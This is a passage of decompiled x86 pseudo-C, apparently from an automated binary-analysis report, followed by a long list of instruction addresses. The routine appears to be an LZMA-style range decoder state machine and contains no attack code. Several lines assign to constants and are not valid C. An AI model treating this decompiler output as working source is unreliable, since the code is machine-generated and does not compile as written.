                                                                                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                      												0x800 = 0x800 - __edx;
                                                                                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *__esi = __cx;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      												goto L39;
                                                                                      											} else {
                                                                                      												goto L37;
                                                                                      											}
                                                                                      										case 0xe:
                                                                                      											L46:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xe;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t156 = __ebp - 0x70;
                                                                                      											 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t156;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											while(1) {
                                                                                      												L48:
                                                                                      												__eflags = __ebx - 0x100;
                                                                                      												if(__ebx >= 0x100) {
                                                                                      													break;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												__edx = __ebx + __ebx;
                                                                                      												__ecx =  *(__ebp - 0x10);
                                                                                      												__esi = __edx + __eax;
                                                                                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      												__ax =  *__esi;
                                                                                      												 *(__ebp - 0x54) = __esi;
                                                                                      												__edi = __ax & 0x0000ffff;
                                                                                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      												if( *(__ebp - 0xc) >= __ecx) {
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      													__cx = __ax;
                                                                                      													_t170 = __edx + 1; // 0x1
                                                                                      													__ebx = _t170;
                                                                                      													__cx = __ax >> 5;
                                                                                      													__eflags = __eax;
                                                                                      													 *__esi = __ax;
                                                                                      												} else {
                                                                                      													 *(__ebp - 0x10) = __ecx;
                                                                                      													0x800 = 0x800 - __edi;
                                                                                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      													__ebx = __ebx + __ebx;
                                                                                      													 *__esi = __cx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													continue;
                                                                                      												} else {
                                                                                      													goto L46;
                                                                                      												}
                                                                                      											}
                                                                                      											L54:
                                                                                      											_t173 = __ebp - 0x34;
                                                                                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                      											__eflags =  *_t173;
                                                                                      											goto L55;
                                                                                      										case 0xf:
                                                                                      											L58:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0xf;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t203 = __ebp - 0x70;
                                                                                      											 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t203;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L60:
                                                                                      											__eflags = __ebx - 0x100;
                                                                                      											if(__ebx >= 0x100) {
                                                                                      												L55:
                                                                                      												__al =  *(__ebp - 0x44);
                                                                                      												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                      												goto L56;
                                                                                      											}
                                                                                      											L61:
                                                                                      											__eax =  *(__ebp - 0x58);
                                                                                      											__edx = __ebx + __ebx;
                                                                                      											__ecx =  *(__ebp - 0x10);
                                                                                      											__esi = __edx + __eax;
                                                                                      											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                      											__ax =  *__esi;
                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                      											__edi = __ax & 0x0000ffff;
                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      												__cx = __ax;
                                                                                      												_t217 = __edx + 1; // 0x1
                                                                                      												__ebx = _t217;
                                                                                      												__cx = __ax >> 5;
                                                                                      												__eflags = __eax;
                                                                                      												 *__esi = __ax;
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                      												0x800 = 0x800 - __edi;
                                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *__esi = __cx;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      											 *(__ebp - 0x44) = __ebx;
                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      												goto L60;
                                                                                      											} else {
                                                                                      												goto L58;
                                                                                      											}
                                                                                      										case 0x10:
                                                                                      											L109:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x10;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t365 = __ebp - 0x70;
                                                                                      											 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t365;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											goto L111;
                                                                                      										case 0x11:
                                                                                      											L69:
                                                                                      											__esi =  *(__ebp - 0x58);
                                                                                      											 *(__ebp - 0x84) = 0x12;
                                                                                      											while(1) {
                                                                                      												 *(_t613 - 0x54) = _t606;
                                                                                      												goto L133;
                                                                                      											}
                                                                                      										case 0x12:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												__eax =  *(__ebp - 0x58);
                                                                                      												 *(__ebp - 0x84) = 0x13;
                                                                                      												__esi =  *(__ebp - 0x58) + 2;
                                                                                      												while(1) {
                                                                                      													 *(_t613 - 0x54) = _t606;
                                                                                      													goto L133;
                                                                                      												}
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                      											__eflags = __eax;
                                                                                      											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                      											goto L130;
                                                                                      										case 0x13:
                                                                                      											__eflags =  *(__ebp - 0x40);
                                                                                      											if( *(__ebp - 0x40) != 0) {
                                                                                      												_t469 = __ebp - 0x58;
                                                                                      												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                      												__eflags =  *_t469;
                                                                                      												 *(__ebp - 0x30) = 0x10;
                                                                                      												 *(__ebp - 0x40) = 8;
                                                                                      												L144:
                                                                                      												 *(__ebp - 0x7c) = 0x14;
                                                                                      												goto L145;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x4c);
                                                                                      											__ecx =  *(__ebp - 0x58);
                                                                                      											__eax =  *(__ebp - 0x4c) << 4;
                                                                                      											 *(__ebp - 0x30) = 8;
                                                                                      											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                      											L130:
                                                                                      											 *(__ebp - 0x58) = __eax;
                                                                                      											 *(__ebp - 0x40) = 3;
                                                                                      											goto L144;
                                                                                      										case 0x14:
                                                                                      											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                      											__eax =  *(__ebp - 0x80);
                                                                                      											 *(_t613 - 0x88) = _t533;
                                                                                      											goto L1;
                                                                                      										case 0x15:
                                                                                      											__eax = 0;
                                                                                      											__eflags =  *(__ebp - 0x38) - 7;
                                                                                      											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      											__al = __al & 0x000000fd;
                                                                                      											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                      											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                      											goto L120;
                                                                                      										case 0x16:
                                                                                      											__eax =  *(__ebp - 0x30);
                                                                                      											__eflags = __eax - 4;
                                                                                      											if(__eax >= 4) {
                                                                                      												_push(3);
                                                                                      												_pop(__eax);
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 4);
                                                                                      											 *(__ebp - 0x40) = 6;
                                                                                      											__eax = __eax << 7;
                                                                                      											 *(__ebp - 0x7c) = 0x19;
                                                                                      											 *(__ebp - 0x58) = __eax;
                                                                                      											goto L145;
                                                                                      										case 0x17:
                                                                                      											L145:
                                                                                      											__eax =  *(__ebp - 0x40);
                                                                                      											 *(__ebp - 0x50) = 1;
                                                                                      											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                      											goto L149;
                                                                                      										case 0x18:
                                                                                      											L146:
                                                                                      											__eflags =  *(__ebp - 0x6c);
                                                                                      											if( *(__ebp - 0x6c) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x18;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x70);
                                                                                      											__eax =  *(__ebp - 0xc);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											_t484 = __ebp - 0x70;
                                                                                      											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                      											__eflags =  *_t484;
                                                                                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      											L148:
                                                                                      											_t487 = __ebp - 0x48;
                                                                                      											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                      											__eflags =  *_t487;
                                                                                      											L149:
                                                                                      											__eflags =  *(__ebp - 0x48);
                                                                                      											if( *(__ebp - 0x48) <= 0) {
                                                                                      												__ecx =  *(__ebp - 0x40);
                                                                                      												__ebx =  *(__ebp - 0x50);
                                                                                      												0 = 1;
                                                                                      												__eax = 1 << __cl;
                                                                                      												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                      												__eax =  *(__ebp - 0x7c);
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												while(1) {
                                                                                      													 *(_t613 - 0x88) = _t533;
                                                                                      													goto L1;
                                                                                      												}
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x50);
                                                                                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      											__eax =  *(__ebp - 0x58);
                                                                                      											__esi = __edx + __eax;
                                                                                      											 *(__ebp - 0x54) = __esi;
                                                                                      											__ax =  *__esi;
                                                                                      											__edi = __ax & 0x0000ffff;
                                                                                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      											if( *(__ebp - 0xc) >= __ecx) {
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      												__cx = __ax;
                                                                                      												__cx = __ax >> 5;
                                                                                      												__eax = __eax - __ecx;
                                                                                      												__edx = __edx + 1;
                                                                                      												__eflags = __edx;
                                                                                      												 *__esi = __ax;
                                                                                      												 *(__ebp - 0x50) = __edx;
                                                                                      											} else {
                                                                                      												 *(__ebp - 0x10) = __ecx;
                                                                                      												0x800 = 0x800 - __edi;
                                                                                      												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      												 *__esi = __cx;
                                                                                      											}
                                                                                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      												goto L148;
                                                                                      											} else {
                                                                                      												goto L146;
                                                                                      											}
                                                                                      										case 0x19:
                                                                                      											__eflags = __ebx - 4;
                                                                                      											if(__ebx < 4) {
                                                                                      												 *(__ebp - 0x2c) = __ebx;
                                                                                      												L119:
                                                                                      												_t393 = __ebp - 0x2c;
                                                                                      												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                      												__eflags =  *_t393;
                                                                                      												L120:
                                                                                      												__eax =  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax;
                                                                                      												if(__eax == 0) {
                                                                                      													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                      													goto L170;
                                                                                      												}
                                                                                      												__eflags = __eax -  *(__ebp - 0x60);
                                                                                      												if(__eax >  *(__ebp - 0x60)) {
                                                                                      													goto L171;
                                                                                      												}
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                      												__eax =  *(__ebp - 0x30);
                                                                                      												_t400 = __ebp - 0x60;
                                                                                      												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                      												__eflags =  *_t400;
                                                                                      												goto L123;
                                                                                      											}
                                                                                      											__ecx = __ebx;
                                                                                      											__eax = __ebx;
                                                                                      											__ecx = __ebx >> 1;
                                                                                      											__eax = __ebx & 0x00000001;
                                                                                      											__ecx = (__ebx >> 1) - 1;
                                                                                      											__al = __al | 0x00000002;
                                                                                      											__eax = (__ebx & 0x00000001) << __cl;
                                                                                      											__eflags = __ebx - 0xe;
                                                                                      											 *(__ebp - 0x2c) = __eax;
                                                                                      											if(__ebx >= 0xe) {
                                                                                      												__ebx = 0;
                                                                                      												 *(__ebp - 0x48) = __ecx;
                                                                                      												L102:
                                                                                      												__eflags =  *(__ebp - 0x48);
                                                                                      												if( *(__ebp - 0x48) <= 0) {
                                                                                      													__eax = __eax + __ebx;
                                                                                      													 *(__ebp - 0x40) = 4;
                                                                                      													 *(__ebp - 0x2c) = __eax;
                                                                                      													__eax =  *(__ebp - 4);
                                                                                      													__eax =  *(__ebp - 4) + 0x644;
                                                                                      													__eflags = __eax;
                                                                                      													L108:
                                                                                      													__ebx = 0;
                                                                                      													 *(__ebp - 0x58) = __eax;
                                                                                      													 *(__ebp - 0x50) = 1;
                                                                                      													 *(__ebp - 0x44) = 0;
                                                                                      													 *(__ebp - 0x48) = 0;
                                                                                      													L112:
                                                                                      													__eax =  *(__ebp - 0x40);
                                                                                      													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                      														_t391 = __ebp - 0x2c;
                                                                                      														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                      														__eflags =  *_t391;
                                                                                      														goto L119;
                                                                                      													}
                                                                                      													__eax =  *(__ebp - 0x50);
                                                                                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      													__eax =  *(__ebp - 0x58);
                                                                                      													__esi = __edi + __eax;
                                                                                      													 *(__ebp - 0x54) = __esi;
                                                                                      													__ax =  *__esi;
                                                                                      													__ecx = __ax & 0x0000ffff;
                                                                                      													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                      													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                      													if( *(__ebp - 0xc) >= __edx) {
                                                                                      														__ecx = 0;
                                                                                      														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                      														__ecx = 1;
                                                                                      														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                      														__ebx = 1;
                                                                                      														__ecx =  *(__ebp - 0x48);
                                                                                      														__ebx = 1 << __cl;
                                                                                      														__ecx = 1 << __cl;
                                                                                      														__ebx =  *(__ebp - 0x44);
                                                                                      														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                      														__cx = __ax;
                                                                                      														__cx = __ax >> 5;
                                                                                      														__eax = __eax - __ecx;
                                                                                      														__edi = __edi + 1;
                                                                                      														__eflags = __edi;
                                                                                      														 *(__ebp - 0x44) = __ebx;
                                                                                      														 *__esi = __ax;
                                                                                      														 *(__ebp - 0x50) = __edi;
                                                                                      													} else {
                                                                                      														 *(__ebp - 0x10) = __edx;
                                                                                      														0x800 = 0x800 - __ecx;
                                                                                      														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                      														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      														 *__esi = __dx;
                                                                                      													}
                                                                                      													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      														L111:
                                                                                      														_t368 = __ebp - 0x48;
                                                                                      														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                      														__eflags =  *_t368;
                                                                                      														goto L112;
                                                                                      													} else {
                                                                                      														goto L109;
                                                                                      													}
                                                                                      												}
                                                                                      												__ecx =  *(__ebp - 0xc);
                                                                                      												__ebx = __ebx + __ebx;
                                                                                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                      												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      												 *(__ebp - 0x44) = __ebx;
                                                                                      												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                      													__ecx =  *(__ebp - 0x10);
                                                                                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      													__ebx = __ebx | 0x00000001;
                                                                                      													__eflags = __ebx;
                                                                                      													 *(__ebp - 0x44) = __ebx;
                                                                                      												}
                                                                                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      													L101:
                                                                                      													_t338 = __ebp - 0x48;
                                                                                      													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                      													__eflags =  *_t338;
                                                                                      													goto L102;
                                                                                      												} else {
                                                                                      													goto L99;
                                                                                      												}
                                                                                      											}
                                                                                      											__edx =  *(__ebp - 4);
                                                                                      											__eax = __eax - __ebx;
                                                                                      											 *(__ebp - 0x40) = __ecx;
                                                                                      											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                      											goto L108;
                                                                                      										case 0x1a:
                                                                                      											L56:
                                                                                      											__eflags =  *(__ebp - 0x64);
                                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x1a;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__ecx =  *(__ebp - 0x68);
                                                                                      											__al =  *(__ebp - 0x5c);
                                                                                      											__edx =  *(__ebp - 8);
                                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      											 *( *(__ebp - 0x68)) = __al;
                                                                                      											__ecx =  *(__ebp - 0x14);
                                                                                      											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                      											__eax = __ecx + 1;
                                                                                      											__edx = 0;
                                                                                      											_t192 = __eax %  *(__ebp - 0x74);
                                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                                      											__edx = _t192;
                                                                                      											goto L79;
                                                                                      										case 0x1b:
                                                                                      											L75:
                                                                                      											__eflags =  *(__ebp - 0x64);
                                                                                      											if( *(__ebp - 0x64) == 0) {
                                                                                      												 *(__ebp - 0x88) = 0x1b;
                                                                                      												goto L170;
                                                                                      											}
                                                                                      											__eax =  *(__ebp - 0x14);
                                                                                      											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      											__eflags = __eax -  *(__ebp - 0x74);
                                                                                      											if(__eax >=  *(__ebp - 0x74)) {
                                                                                      												__eax = __eax +  *(__ebp - 0x74);
                                                                                      												__eflags = __eax;
                                                                                      											}
                                                                                      											__edx =  *(__ebp - 8);
                                                                                      											__cl =  *(__eax + __edx);
                                                                                      											__eax =  *(__ebp - 0x14);
                                                                                      											 *(__ebp - 0x5c) = __cl;
                                                                                      											 *(__eax + __edx) = __cl;
                                                                                      											__eax = __eax + 1;
                                                                                      											__edx = 0;
                                                                                      											_t274 = __eax %  *(__ebp - 0x74);
                                                                                      											__eax = __eax /  *(__ebp - 0x74);
                                                                                      											__edx = _t274;
                                                                                      											__eax =  *(__ebp - 0x68);
                                                                                      											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      											_t283 = __ebp - 0x64;
                                                                                      											 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                      											__eflags =  *_t283;
                                                                                      											 *( *(__ebp - 0x68)) = __cl;
                                                                                      											L79:
                                                                                      											 *(__ebp - 0x14) = __edx;
                                                                                      											goto L80;
                                                                                      										case 0x1c:
                                                                                      											while(1) {
                                                                                      												L123:
                                                                                      												__eflags =  *(__ebp - 0x64);
                                                                                      												if( *(__ebp - 0x64) == 0) {
                                                                                      													break;
                                                                                      												}
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      												__eflags = __eax -  *(__ebp - 0x74);
                                                                                      												if(__eax >=  *(__ebp - 0x74)) {
                                                                                      													__eax = __eax +  *(__ebp - 0x74);
                                                                                      													__eflags = __eax;
                                                                                      												}
                                                                                      												__edx =  *(__ebp - 8);
                                                                                      												__cl =  *(__eax + __edx);
                                                                                      												__eax =  *(__ebp - 0x14);
                                                                                      												 *(__ebp - 0x5c) = __cl;
                                                                                      												 *(__eax + __edx) = __cl;
                                                                                      												__eax = __eax + 1;
                                                                                      												__edx = 0;
                                                                                      												_t414 = __eax %  *(__ebp - 0x74);
                                                                                      												__eax = __eax /  *(__ebp - 0x74);
                                                                                      												__edx = _t414;
                                                                                      												__eax =  *(__ebp - 0x68);
                                                                                      												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                      												__eflags =  *(__ebp - 0x30);
                                                                                      												 *( *(__ebp - 0x68)) = __cl;
                                                                                      												 *(__ebp - 0x14) = _t414;
                                                                                      												if( *(__ebp - 0x30) > 0) {
                                                                                      													continue;
                                                                                      												} else {
                                                                                      													L80:
                                                                                      													 *(__ebp - 0x88) = 2;
                                                                                      													goto L1;
                                                                                      												}
                                                                                      											}
                                                                                      											 *(__ebp - 0x88) = 0x1c;
                                                                                      											goto L170;
                                                                                      									}
                                                                                      								}
                                                                                      								L171:
                                                                                      								_t535 = _t534 | 0xffffffff;
                                                                                      								goto L172;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      			}













                                                                                      0x00000000
                                                                                      0x00406f64
                                                                                      0x00406f64
                                                                                      0x00406f68
                                                                                      0x00406f91
                                                                                      0x00406f9b
                                                                                      0x00406f6a
                                                                                      0x00406f73
                                                                                      0x00406f80
                                                                                      0x00406f83
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x004072ca
                                                                                      0x004072ca
                                                                                      0x004072ca
                                                                                      0x004072d0
                                                                                      0x004072d6
                                                                                      0x004072dc
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072ff
                                                                                      0x0040730a
                                                                                      0x0040730c
                                                                                      0x004072de
                                                                                      0x004072de
                                                                                      0x004072ed
                                                                                      0x004072f1
                                                                                      0x004072f1
                                                                                      0x00407316
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407318
                                                                                      0x0040731c
                                                                                      0x004074cb
                                                                                      0x004074e1
                                                                                      0x004074e9
                                                                                      0x004074f0
                                                                                      0x004074f2
                                                                                      0x004074f9
                                                                                      0x004074fd
                                                                                      0x004074fd
                                                                                      0x00407328
                                                                                      0x0040732f
                                                                                      0x00407337
                                                                                      0x0040733a
                                                                                      0x0040733d
                                                                                      0x0040733d
                                                                                      0x00407343
                                                                                      0x00407343
                                                                                      0x00406adf
                                                                                      0x00406adf
                                                                                      0x00406adf
                                                                                      0x00406ae8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406aee
                                                                                      0x00000000
                                                                                      0x00406af9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b02
                                                                                      0x00406b05
                                                                                      0x00406b08
                                                                                      0x00406b0c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b12
                                                                                      0x00406b15
                                                                                      0x00406b17
                                                                                      0x00406b18
                                                                                      0x00406b1b
                                                                                      0x00406b1d
                                                                                      0x00406b1e
                                                                                      0x00406b20
                                                                                      0x00406b23
                                                                                      0x00406b28
                                                                                      0x00406b2d
                                                                                      0x00406b36
                                                                                      0x00406b49
                                                                                      0x00406b4c
                                                                                      0x00406b58
                                                                                      0x00406b80
                                                                                      0x00406b82
                                                                                      0x00406b90
                                                                                      0x00406b90
                                                                                      0x00406b94
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b84
                                                                                      0x00406b84
                                                                                      0x00406b87
                                                                                      0x00406b88
                                                                                      0x00406b88
                                                                                      0x00000000
                                                                                      0x00406b84
                                                                                      0x00406b5e
                                                                                      0x00406b63
                                                                                      0x00406b63
                                                                                      0x00406b6c
                                                                                      0x00406b74
                                                                                      0x00406b77
                                                                                      0x00000000
                                                                                      0x00406b7d
                                                                                      0x00406b7d
                                                                                      0x00000000
                                                                                      0x00406b7d
                                                                                      0x00000000
                                                                                      0x00406b9a
                                                                                      0x00406b9a
                                                                                      0x00406b9e
                                                                                      0x0040744a
                                                                                      0x00000000
                                                                                      0x0040744a
                                                                                      0x00406ba7
                                                                                      0x00406bb7
                                                                                      0x00406bba
                                                                                      0x00406bbd
                                                                                      0x00406bbd
                                                                                      0x00406bbd
                                                                                      0x00406bc0
                                                                                      0x00406bc4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bc6
                                                                                      0x00406bcc
                                                                                      0x00406bf6
                                                                                      0x00406bfc
                                                                                      0x00406c03
                                                                                      0x00000000
                                                                                      0x00406c03
                                                                                      0x00406bd2
                                                                                      0x00406bd5
                                                                                      0x00406bda
                                                                                      0x00406bda
                                                                                      0x00406be5
                                                                                      0x00406bed
                                                                                      0x00406bf0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c35
                                                                                      0x00406c3b
                                                                                      0x00406c3e
                                                                                      0x00406c4b
                                                                                      0x00406c53
                                                                                      0x004072c7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c0a
                                                                                      0x00406c0a
                                                                                      0x00406c0e
                                                                                      0x00407459
                                                                                      0x00000000
                                                                                      0x00407459
                                                                                      0x00406c1a
                                                                                      0x00406c25
                                                                                      0x00406c25
                                                                                      0x00406c25
                                                                                      0x00406c28
                                                                                      0x00406c2b
                                                                                      0x00406c2e
                                                                                      0x00406c33
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004072ca
